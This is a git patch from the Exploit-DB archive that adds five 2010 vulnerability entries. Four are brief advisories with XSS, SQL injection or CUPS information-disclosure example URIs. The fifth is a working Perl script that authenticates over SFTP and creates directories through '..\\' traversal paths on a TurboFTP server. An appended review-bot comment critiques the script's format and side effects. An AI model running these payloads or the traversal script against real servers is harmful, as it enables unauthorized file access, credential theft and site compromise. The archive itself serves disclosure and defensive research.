From 8041bf2c96c19470ae50588f256cd65649fb74eb Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 25 Jul 2014 04:38:51 +0000
Subject: [PATCH] Updated 07_25_2014
---
 files.csv | 5 ++++
 platforms/linux/remote/34152.txt | 9 +++++++
 platforms/php/webapps/34153.txt | 15 ++++++++++++
 platforms/php/webapps/34154.txt | 7 ++++++
 platforms/php/webapps/34155.txt | 12 ++++++++++
 platforms/windows/remote/34156.pl | 39 +++++++++++++++++++++++++++++++
 6 files changed, 87 insertions(+)
 create mode 100755 platforms/linux/remote/34152.txt
 create mode 100755 platforms/php/webapps/34153.txt
 create mode 100755 platforms/php/webapps/34154.txt
 create mode 100755 platforms/php/webapps/34155.txt
 create mode 100755 platforms/windows/remote/34156.pl
diff --git a/files.csv b/files.csv
index cae38e15a..3b5b27292 100755
--- a/files.csv
+++ b/files.csv
@@ -30756,3 +30756,8 @@ id,file,description,date,author,platform,type,port
 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
 34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
+34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0
+34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0
+34154,platforms/php/webapps/34154.txt,"Software Index 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
+34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
+34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0
diff --git a/platforms/linux/remote/34152.txt b/platforms/linux/remote/34152.txt
new file mode 100755
index 000000000..0752fe9c4
--- /dev/null
+++ b/platforms/linux/remote/34152.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40897/info
+
+CUPS is prone to a remote information-disclosure vulnerability. This issue affects the CUPS web interface component.
+
+Remote attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+
+NOTE: This issue was previously covered in BID 40871 (Apple Mac OS X Prior to 10.6.4 Multiple Security Vulnerabilities), but has been given its own record to better document it.
+
+http://www.example.com:631/admin?URL=/admin/&OP=%
\ No newline at end of file
diff --git a/platforms/php/webapps/34153.txt b/platforms/php/webapps/34153.txt
new file mode 100755
index 000000000..4ebf266c2
--- /dev/null
+++ b/platforms/php/webapps/34153.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/40913/info
+
+2daybiz Network Community Script is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following example URIs are available:
+
+SQL Injection:
+
+http://www.example.com/products/orkutclone/view_photo.php?page=3&alb=[SQLI]
+
+Cross site Scripting:
+
+http://www.example.com/products/orkutclone/scrapbook.php?id=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/34154.txt b/platforms/php/webapps/34154.txt
new file mode 100755
index 000000000..16773a160
--- /dev/null
+++ b/platforms/php/webapps/34154.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40914/info
+
+Software Index is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/signinform.php?msg=/">indoushka
\ No newline at end of file
diff --git a/platforms/php/webapps/34155.txt b/platforms/php/webapps/34155.txt
new file mode 100755
index 000000000..471b3a596
--- /dev/null
+++ b/platforms/php/webapps/34155.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/40917/info
+
+Ceica-GW is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following example URIs are available:
+
+http://www.example.com/Ceica/login.php/>">XroGuE
+
+http://www.example.com/Ceica/login.php/>">
+
diff --git a/platforms/windows/remote/34156.pl b/platforms/windows/remote/34156.pl
new file mode 100755
index 000000000..4310ff6dd
--- /dev/null
+++ b/platforms/windows/remote/34156.pl
@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/40919/info
+
+TurboFTP Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to download or upload arbitrary files outside the root directory. This may aid in further attacks.
+
+TurboFTP Server 1.20.745 is vulnerable; prior versions may also be affected.
+
+#!/usr/bin/perl
+#leinakesi[at]gmail.com
+#turboFTP Server(sftp module) directory traversal vulnerability
+
+use Net::SSH2;
+use Getopt::Std;
+
+
+@FUZZ = ("..\\A\\", "..\\AA");
+getopts('S:P:u:p:', \%opts);
+$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};
+
+if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) ) {
+ print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
+ print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
+ exit(0);
+}
+
+$ssh2 = Net::SSH2->new();
+$ssh2->connect($server, $port) || die "can not connect the server, please check.\n"; $ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n"; $sftp = $ssh2->sftp();
+
+foreach(@FUZZ)
+{
+ if($m = $sftp->mkdir($_))
+ {
+ print "mkdir success, $_\n";
+ }
+}
+
+$ssh2->disconnect();
+exit(0);
\ No newline at end of file
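Review bot: The eight advisory lines that open this new `.pl` file (from `source: http://www.securityfocus.com/bid/40919/info` through the version statement) carry no comment marker, so `#!/usr/bin/perl` ends up on line 9 and the file, committed with mode 100755, is prose and script mixed together rather than parseable Perl; prefix each header line with `#` or move the prose below an `__END__` marker. The script also never documents its side effect: each successful `$sftp->mkdir($_)` leaves a directory named by the `@FUZZ` entries (`..\A\`, `..\AA`) on the tested server and nothing removes it, so a header comment such as `# creates directories A and AA via ..\ paths on the target; remove them after verifying the fix` would serve whoever uses this to validate a patched server. Those same `..\` segments in an authenticated SFTP mkdir path are the string a server-side log review or filter rule would key on, which is worth a one-line comment next to `@FUZZ`. On style, `use strict; use warnings;` is absent, the result of `$ssh2->sftp()` is used without a check, and `$m` is assigned but never read.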